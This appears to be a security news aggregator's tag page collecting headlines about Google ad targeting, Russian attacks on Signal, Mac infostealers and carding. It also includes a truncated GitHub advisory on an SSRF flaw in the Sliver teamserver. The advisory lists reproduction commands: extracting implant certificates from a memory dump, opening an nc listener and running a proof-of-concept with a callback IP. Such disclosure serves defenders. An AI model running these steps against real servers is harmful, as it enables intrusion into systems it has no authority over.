Security
Headlines
HeadlinesLatestCVEs

Tag

#google

Google Ad-Tech Users Can Target National Security ‘Decision Makers’ and People With Chronic Diseases

Google enables marketers to target people with serious illnesses and crushing debt—against its policies—as well as the makers of classified defense technology, a WIRED investigation has found.

Wired
Open in Source
#web#google#git#intel#auth
How One AI Startup Founder Cornered Microsoft Into Finally Taking Down Explicit Videos of Her

Breeze Liu has been a prominent advocate for victims. But even she struggled to scrub nonconsensual intimate images and videos of herself from the web.

Russian Groups Target Signal Messenger in Spy Campaign

These sorts of attacks reveal growing adversary interest in secure messaging apps used by high-value targets for communication, Google says.

GHSA-fh4v-v779-4g2w: SSRF in sliver teamserver

### Summary The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so ### Reproduction steps Run server ``` wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux chmod +x sliver-server_linux ./sliver-server_linux ``` Generate binary ``` generate --mtls 127.0.0.1:8443 ``` Run it on windows, then `Task manager -> find process -> Create memory dump file` Install RogueSliver and get the certs ``` git clone https://github.com/ACE-Responder/RogueSliver.git pip3 install -r requirements.txt --break-system-packages python3 ExtractCerts.py implant.dmp ``` Start callback listener. Teamserver will connect when POC is run and send "ssrf poc" to nc ``` nc -nvlp 1111 ``` Run the poc (pasted at bottom of this file) ``` python3 poc.py <SLIVER IP> <MTLS PORT> <CALLBACK IP> <CALLBACK PORT> python3 poc.py 192.168.1.33 8443 44.221.186.72 1111...

Hackers Tricking Users Into Linking Devices to Steal Signal Messages

Is your Signal, WhatsApp, or Telegram account safe? Google warns of increasing attacks by Russian state-backed groups. Learn…

Google now allows digital fingerprinting of its users

Google is allowing its advertizing customers to fingerprint website visitors. Can you stop it?

Macs targeted by infostealers in new era of cyberthreats

Info stealers are thriving on Mac, with one specific variant accounting for 70% of all info stealer detections at the end of 2024.

A Signal Update Fends Off a Phishing Technique Used in Russian Espionage

Google warns that hackers tied to Russia are tricking Ukrainian soldiers with fake QR codes for Signal group invites that let spies steal their messages. Signal has pushed out new safeguards.

How Phished Data Turns into Apple & Google Wallets

Carding -- the underground business of stealing, selling and swiping stolen payment card data -- has long been the dominion of Russia-based hackers. Happily, the broad deployment of more secure chip-based payment cards in the United States has weakened the carding market. But a flurry of innovation from cybercrime groups in China is breathing new life into the carding industry, by turning phished card data into mobile wallets that can be used online and at main street stores.